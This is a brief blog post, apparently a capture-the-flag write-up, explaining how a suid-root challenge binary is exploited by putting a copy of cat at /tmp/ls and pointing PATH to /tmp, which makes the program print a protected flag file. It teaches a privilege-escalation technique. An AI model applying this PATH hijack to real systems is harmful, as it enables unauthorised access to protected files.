Friday, May 6, 2016

Exploiting suid binary on ELF32 - System 1

Once logged in, I issued the "ls -l" command and find the binary "ch11" as well as the source code file. Notice the permissions of ch11 is suid root and our user account doesn't have permissions to view the contents of the .passwd file which contains the flag. Even without the source code file, we can use the "strings" command to find enough of a clue to solve this challenge without a debugger. Notice the "ls /challenge/app-script/ch11/.passwd" where the .passwd file contains the flag.

I execute the ch11 binary:

Since the binary is suid, whatever command it executes runs as the file owner instead of our user.

I copied the /bin/cat command to /tmp/ls and export my path to /tmp and run the ch11 binary again. This time it executes the cat command from the /tmp/ls command and outputs the flag in the ".passwd" file!